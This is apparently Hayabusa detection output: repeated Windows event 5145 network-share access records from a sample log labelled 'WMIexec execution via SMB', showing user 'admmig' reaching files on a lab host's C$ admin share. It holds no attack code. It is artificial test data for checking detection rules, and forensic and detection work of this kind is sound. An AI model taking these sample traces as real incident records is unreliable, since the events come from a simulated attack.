10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S8ca2c749#\cba0b74c99ed7ace30d99b1ed03059e9 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.953 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S54faafb0# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.953 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S54faafb0#\1ccd3b57c9350fc1afa3ed354290f755 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S356e1ba0# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S356e1ba0#\0cf0db1a6758c7e0c0ba05029f155cfa : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S88747207# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S88747207#\1c10bd935ecce56f3dada604138983f2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sa56e3556# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sa56e3556#\9c705405cffb72e6df411a91a2c062c7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sb6a1f1bc# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sb6a1f1bc#\88a7ae331deac4585f47de7e6e4277dc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.T9d753d8c# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.T9d753d8c#\e2e911ae8e5924a9ef63135cd8c6b797 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te49ad7d9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te49ad7d9#\f8a02123f968d1ae6940ac5d6a1dd485 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te3736ca4# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te3736ca4#\e4a04c178babbb8bb5aaf6d60b47d649 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.017 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ud0e65fb9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.017 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ud0e65fb9#\d90607e7c895999c98edb4043f0073e5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.017 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\fab34eeddd8d0d9679cce669b2cff4fe : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V4381984f# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V4381984f#\1a33211365967c012f504ade4abce1ed : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vb0a86591# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vb0a86591#\f21bca07e5816f88c1107f51e64caa60 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vf4833439# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vf4833439#\fb6f372260a08811a4ca7666c60e31e8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.VisualC : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.VisualC\8dd5d48acfdc4ce750166ebe36623926 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W0bb5dac4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W0bb5dac4#\eff9f99a173bfe23d56129e79f85e220 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.063 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2bac6884# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.063 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2bac6884#\98fa0075b3677ec2d6a5e980c8c194e2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.081 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2d29a719# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.081 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2d29a719#\b04af69b54fb462c4c632d0f508d617b : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.081 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2d6979e4# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.081 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2d6979e4#\b77a61cdfca8e3f67916586b89eb6df5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.097 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2ded559f# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.097 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2ded559f#\2cbdedd1fc5676a39a1fb1b534f48d02 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.097 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W3cdb5602# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.113 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W3cdb5602#\e3e82e97635cdd0d33dd1fb39ffe5b5f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.113 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W6c95e797# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.113 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W6c95e797#\4bdb448dffd981eb795d0efeaf81aee9 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.113 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W6dcfceb1# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W6dcfceb1#\bbfc6bc472afc457c523dc2738248629 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W7b7c0837# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W7b7c0837#\294124bd4523f5af19788c4942aeba5e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W9e7db7c5# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W9e7db7c5#\e9ab45e2a1806140421e99300db14933 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W9e8926d3# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W9e8926d3#\278d9be2765837ed33460677146f35e8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W15cd0137# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W15cd0137#\82f3f76602a3738000b03df08a71ffe8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W37d1a032# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W37d1a032#\d3293b74965baef61a05323c7ec98d92 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.160 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W39c436dd# : IP Address: 
